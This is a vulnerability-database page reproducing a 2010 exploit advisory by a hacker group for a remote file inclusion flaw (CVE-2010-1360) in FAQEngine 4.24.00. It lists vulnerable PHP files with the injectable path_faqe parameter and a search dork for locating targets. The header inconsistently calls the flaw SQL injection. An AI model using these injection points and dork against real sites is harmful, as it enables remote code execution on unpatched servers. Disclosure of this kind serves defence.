FAQEngine 4.24.00 - Remote File Inclusion vulnerability

2010.04.16

Credit: kaMtiEz

Risk: High

Local: No

Remote: Yes

CVE: CVE-2010-1360

CWE: CWE-94

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

###################################################################################
                                                                                  #
[~] FAQEngine 4.24.00 - Remote File Inclusion vulnerability   [ RFI ]             #
[~] Author	: kaMtiEz (kamzcrew@gmail.com)                                    #
[~] Homepage	: http://www.indonesiancoder.com                                  #
[~] Date	: January 6, 2010                                                 #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -            
[+] Location : INDONESIA - JOGJA

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]

etc etc etc .. too much ..

[ ERROR IN ]

require_once($path_faqe."/includes/global.inc.php");

[ FIX ] 

dunno .. :P~~

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] KEEP MOVIN .. !
[+] INDONESIANCODER still r0x

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM 

References:

http://xforce.iss.net/xforce/xfdb/55532

http://www.securityfocus.com/bid/37719

http://www.exploit-db.com/exploits/11111

http://packetstormsecurity.org/1001-exploits/faqengine-rfi.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FAQEngine 4.24.00 - Remote File Inclusion vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.